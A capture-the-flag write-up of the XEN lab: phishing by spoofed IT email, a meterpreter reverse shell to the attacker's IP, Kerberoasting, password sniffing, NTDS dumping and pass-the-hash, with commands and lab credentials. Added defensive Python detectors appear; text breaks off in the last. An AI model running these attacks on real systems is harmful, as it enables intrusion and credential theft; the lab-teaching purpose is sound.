SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>

It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.

Overview of Web Services

Let's take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443; the certificate for the site provided a new domain of humongousretail.com.

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn't come up with anything useful.

wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ

Web Directories

We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.

Opening the https://hunongousretail.com/remote, I get the following.

And browsing https://hunongousretail.com/jakarta, I got the following.

I had a look at these for some time to see if I could come up with anything useful: I looked deeper into the directories and searched for known exploits for the XenApp application. Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory rather than Jakarta. After spending some more time on this, I decided to investigate the SMTP service; I had done exercises in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone.

smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12

I had found 4 addresses:

  • sales@humongousretail.com
  • it@humongousretail.com
  • marketing@humongousretail.com
  • legal@humongousretail.com

Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails and a lot of different subjects. I eventually got a hit with the subject of Remote. My plan was to get the users to click on my link. The email I sent was as follows:

telnet 10.13.38.12 25
helo humongousretail.com
MAIL FROM: it@humongousretail.com
RCPT TO: sales@humongousretail.com
DATA
Subject: Remote Portal

Hi,

The URL for the remote portal has now been changed to http://10.14.15.106

Regards
IT
.
QUIT

I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!. Although I knew this had worked, I tried again to be sure I had it right, and got a response from a different user.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response gave me the user awardel and password @M3m3ntoM0ri@. I now had 3 users:

  • pmorgan:Summer1Summer!
  • jmendes:VivaBARC3L0N@!!!
  • awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan.

And I now had access to a desktop.

I tried this for each user that I had, and each of them worked and successfully logged in.

I clicked on the Desktop to access it and was asked to open the launch.ica file, which defaulted to open with the Citrix Receiver Engine (after I had installed icaclientWeb_19.12.0.19_amd64.deb on Kali).

Once I had clicked OK, I was presented with a Desktop. I browsed to the Desktop of the user and found the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges. I first made a note of all the users and the desktops they were assigned to.

I created the reverse shell that I wanted so that I could get a meterpreter session.

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe -o x86exploit.exe

I then proceeded to set up my msfconsole as follows.

Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine on the vdesktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session to the background and started the suggester.

use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit.

use exploit/windows/local/always_install_elevated

I had successfully raised my privileges.  I looked to see what was on the Administrator Desktop, and I had found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the inside of the network and could see the internal range 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a SOCKS proxy within msf.

use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network. Knowing the IPs of the desktops, I chose to scan only a small range, between .199 and .210.

I managed to get an additional 3 IPs.

  • 172.16.249.200 (DC)
  • 172.16.249.201 (Citrix)
  • 172.16.249.202 (NetScaler)

Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I decided to upload the Kerberoasting module.

Further credentials

I now wanted to see if there were any further credentials that I could find.

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt



v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir


Directory: C:\Users\pmorgan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we use]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 
$krb5tgs$23$*mturner$htb.local$MSSQLSvc

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied this hash into a file named mturner so that I could run it through hashcat.

I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsarules.git.

hashcat -m 13100 ./mturner rockyou.txt -r rules/_NSAKEY.v2.dive.rule --debug-mode=1 --debugfile=matched.rule --force -O

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!
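The defender’s counterpart to the Rubeus and GetUserSPNs runs above, as an added example that is not from this write-up: every service ticket the DC issues is logged as Security event 4769 with its encryption type, so RC4 tickets for user-account SPNs can be hunted for and the accounts that still accept RC4 can be found and fixed. The field names are those of the Windows 4769 event; the sample records, the sqlsvc account and the client addresses are constructed.

```python
"""Flag Kerberoasting-style ticket requests in Windows Security event 4769 records.

Added example, not part of the write-up. The Rubeus output above is the
attacker's side: the roasted account only supported RC4_HMAC_DEFAULT, and
Rubeus can force RC4 even for AES-enabled accounts. On the DC every issued
service ticket is logged as event 4769 with its encryption type, so RC4 (0x17)
tickets for user-account SPNs are the signal to hunt for. Sample records are
constructed; 'sqlsvc' and the client addresses are made up.
"""
from collections import defaultdict

RC4_HMAC = "0x17"      # TicketEncryptionType as logged; AES would be 0x11 / 0x12

# Constructed 4769 events; field names follow the Windows Security log schema.
SAMPLE_4769 = [
    {"TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "CITRIXTEST$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:172.16.249.204", "Status": "0x0"},
    {"TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "mturner",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.16.249.204", "Status": "0x0"},
    {"TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.16.249.204", "Status": "0x0"},
    {"TargetUserName": "jmendes@HTB.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.16.249.205", "Status": "0x0"},
    {"TargetUserName": "jmendes@HTB.LOCAL", "ServiceName": "mturner",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:172.16.249.205", "Status": "0x1f"},
]


def is_roast_candidate(event):
    """True for a successfully issued RC4 service ticket for a user-account SPN.

    Computer accounts (names ending in '$') and krbtgt are excluded: machine
    passwords are long and random, and a TGT request is not a roast.
    """
    svc = event["ServiceName"]
    return (event["TicketEncryptionType"] == RC4_HMAC
            and event["Status"] == "0x0"          # 0x0 = success (KDC_ERR_NONE)
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def roast_report(events):
    """Group RC4 user-SPN ticket requests by requesting account.

    Returns {requester: sorted distinct service accounts}. One principal
    pulling RC4 tickets for several service accounts in a short window is
    the classic Kerberoast pattern.
    """
    hits = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {who: sorted(svcs) for who, svcs in hits.items()}


def weak_etype_accounts(events):
    """Service accounts that were issued an RC4 ticket at all: move these to
    AES-only with a long random password or a gMSA, so a captured ticket is
    not worth cracking."""
    return sorted({ev["ServiceName"] for ev in events if is_roast_candidate(ev)})


if __name__ == "__main__":
    for requester, services in roast_report(SAMPLE_4769).items():
        print(f"{requester}: RC4 TGS for {', '.join(services)}")
    print("accounts to move to AES:", weak_etype_accounts(SAMPLE_4769))
```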

SMB Access

Now that I had the new credentials I looked about a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything.

proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201

This showed that we had read access to the files located in the Citrix$ share. I connected to it with smbclient to see what was inside.

proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner

I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these files and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

Putty file Conversion

Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in PuTTY but has a password on it too. I needed to try and crack the password on this before I could proceed. I decided to convert this with putty2john.

putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the password with what I had.  I decided to look elsewhere to see what I could potentially use as a password list generator.  I found a password generator that seemed interesting and decided to run with it.  I found this at https://github.com/hashcat/kwprocessor 

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route

Once I had the password list generated, I then had to put it through john to try and crack it again.

john -w=./passes private.hash

Now that I knew the password for the file, I could convert it for use with my system. To do this, I used puttygen.

puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

During the time gathering information, I had accumulated many user IDs and I tried all of them with the private key to get onto the SSH of the NetScaler. I then quickly found that the default username of these devices is nsroot, and attempted to log in with this user.

proxychains ssh -i id_rsa nsroot@172.16.249.202

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdumpexamples/.

I attempted this to see if I would get any results.

tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"

4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage

LDAP

Knowing that I had root access to this box, I wanted to perform some additional tests to see what other traffic was being passed through it. The previous flag seemed to suggest LDAP might be in use, so I set up tcpdump to capture it for me.

tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.
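What Wireshark showed in that capture, as an added example that is not part of the write-up: a hand-rolled BER decoder for LDAP BindRequests, which makes clear why the password was readable. A simple bind carries the password as a plain OCTET STRING, while a SASL bind exposes only the mechanism name, so a sensor on port 389 can alert on simple binds until LDAPS or required signing removes them. The messages are constructed; only the netscaler-svc name and its password come from the page.

```python
"""Spot LDAP simple binds (password in the clear) in captured LDAP messages.

Added example, not part of the write-up. It shows why tcpdump on the NetScaler
exposed #S3rvice#@cc: a BindRequest with the 'simple' authentication choice is
just an OCTET STRING holding the password, readable by anything on the path
unless the bind runs over TLS. BER is decoded by hand; samples are constructed.
"""

def ber(tag, payload):
    """Encode one BER TLV with a definite length (short or long form)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload

def read_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the TLV starting at buf[pos]."""
    tag, first = buf[pos], buf[pos + 1]
    pos, length = pos + 2, first
    if first & 0x80:                  # long form: low 7 bits = count of length bytes
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length

def parse_bind(msg):
    """Decode one LDAPMessage; return a dict for a BindRequest, else None.

    BindRequest ::= [APPLICATION 0] SEQUENCE { version INTEGER, name LDAPDN,
        authentication CHOICE { simple [0] OCTET STRING, sasl [3] SaslCredentials } }
    """
    tag, body, _ = read_tlv(msg)
    if tag != 0x30:                   # LDAPMessage is a SEQUENCE
        return None
    _, msg_id, pos = read_tlv(body)
    op_tag, op, _ = read_tlv(body, pos)
    if op_tag != 0x60:                # [APPLICATION 0] = BindRequest
        return None
    _, version, pos = read_tlv(op)
    _, name, pos = read_tlv(op, pos)
    auth_tag, auth, _ = read_tlv(op, pos)
    info = {"id": int.from_bytes(msg_id, "big"), "version": version[0],
            "name": name.decode("utf-8", "replace")}
    if auth_tag == 0x80:              # simple: the password itself
        info.update(auth="simple", secret=auth.decode("utf-8", "replace"))
    elif auth_tag == 0xA3:            # sasl: only the mechanism name is visible
        _, mech, _ = read_tlv(auth)
        info.update(auth="sasl", mechanism=mech.decode())
    else:
        info.update(auth=f"unknown(0x{auth_tag:02x})")
    return info

def bind_request(msg_id, name, auth):
    """Build a v3 BindRequest as a client would (used for the constructed samples)."""
    op = ber(0x02, b"\x03") + ber(0x04, name.encode()) + auth
    return ber(0x30, ber(0x02, bytes([msg_id])) + ber(0x60, op))

# Constructed captures: a simple bind, a SASL (GSS-SPNEGO) bind and a SearchRequest.
SIMPLE_BIND = bind_request(1, "HTB\\netscaler-svc", ber(0x80, b"#S3rvice#@cc"))
SASL_BIND = bind_request(2, "", ber(0xA3, ber(0x04, b"GSS-SPNEGO") + ber(0x04, b"\x60\x82")))
SEARCH_REQ = ber(0x30, ber(0x02, b"\x03") + ber(0x63, b""))

def cleartext_binds(messages):
    """The binds a DC operator wants alerted on; LDAPS or required signing prevents them."""
    return [p for p in map(parse_bind, messages) if p and p["auth"] == "simple"]

if __name__ == "__main__":
    for hit in cleartext_binds([SIMPLE_BIND, SASL_BIND, SEARCH_REQ]):
        print(f"cleartext bind as {hit['name']!r}, password length {len(hit['secret'])}")
```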

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151e
a644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445 Name: 172.16.249.201 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
Citrix$ READ ONLY
IPC$ NO ACCESS
ISOs NO ACCESS
ISOs-TEST NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available

Doppelganger

A doppelganger is a non-biologically related look-alike (Wikipedia). This gave me the hint to look back at the other accounts that were active on the domain. I immediately got access to a shell again on the desktop and looked up domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that backup-svc had the same password as the NetScaler account; these two essentially shared the same password. This was our doppelganger. I then tried to log in to the Domain Controller using WinRM and proxychains to see if I could get access, because I knew the account was a member of the Backup Operators group, which generally has access.

proxychains ruby winrm_shell_with_upload.rb

root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?} 
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger

Privileges

Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM.

whoami /priv

This was sure interesting.  It seems I had a few privileges including the Backup and Restore.  This seemed obvious though with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with backup privileges.  I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes.  This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.

I looked at all the usual methods of creating a shadow copy, including vssadmin and wbadmin. However, I then found an article which covered doing this with diskshadow, highlighted in the following document: https://github.com/decoder-it/whoamipriv-Hackinparis2019/blob/master/whoamiprivParis_Split.pdf. I wanted to try and get RDP access to the machine and therefore set up a portfwd to give me access.

portfwd add -l 3389 -r 172.16.249.200 -p 3389

I then tried to open an RDP session to the machine using remmina.

I decided to use xfreerdp through proxychains instead of remmina, hoping that would give me a little more access.

Install freerdp-x11

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc 
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

Diskshadow
set context persistent nowriters
add volume c: alias dmwong
create expose %dmwong% z:

Once I had created the shadow copy, I retrieved the files from it by importing the modules found at

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug.

I opened PowerShell and imported the 2 modules.

Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline I needed to extract the hashes.

python /opt/impacket/examples/secretsdump.py -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.
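Tying the Doppelganger step to this dump, as an added example that is not the write-up’s code: grouping identical NT hashes in a secretsdump-style export finds shared passwords such as netscaler-svc/backup-svc without cracking anything, which is the audit a defender runs against their own NTDS export. The dump is constructed (RIDs and hashes are made up apart from the well-known empty LM/NT values); the `domain\user:rid:lmhash:nthash:::` line layout is secretsdump’s.

```python
"""Audit a secretsdump-style NTDS export for accounts that share a password.

Added example, not from the write-up. The doppelganger step worked because
backup-svc and netscaler-svc had the same password; identical NT hashes in the
dump expose that kind of reuse without cracking, and the same pass picks up
empty passwords and accounts still storing an LM hash. The dump below is
constructed (made-up RIDs and hashes, apart from the well-known empty values).
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""

# secretsdump prints NTDS entries as  domain\user:rid:lmhash:nthash:::
LINE_RE = re.compile(r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::")

SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\netscaler-svc:1104:aad3b435b51404eeaad3b435b51404ee:feedfacefeedfacefeedfacefeedface:::
htb.local\\backup-svc:1105:aad3b435b51404eeaad3b435b51404ee:feedfacefeedfacefeedfacefeedface:::
htb.local\\mturner:1106:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
htb.local\\legacy-app:1107:0123456789abcdef0123456789abcdef:31d6cfe0d16ae931b73c59d7e0c089c0:::
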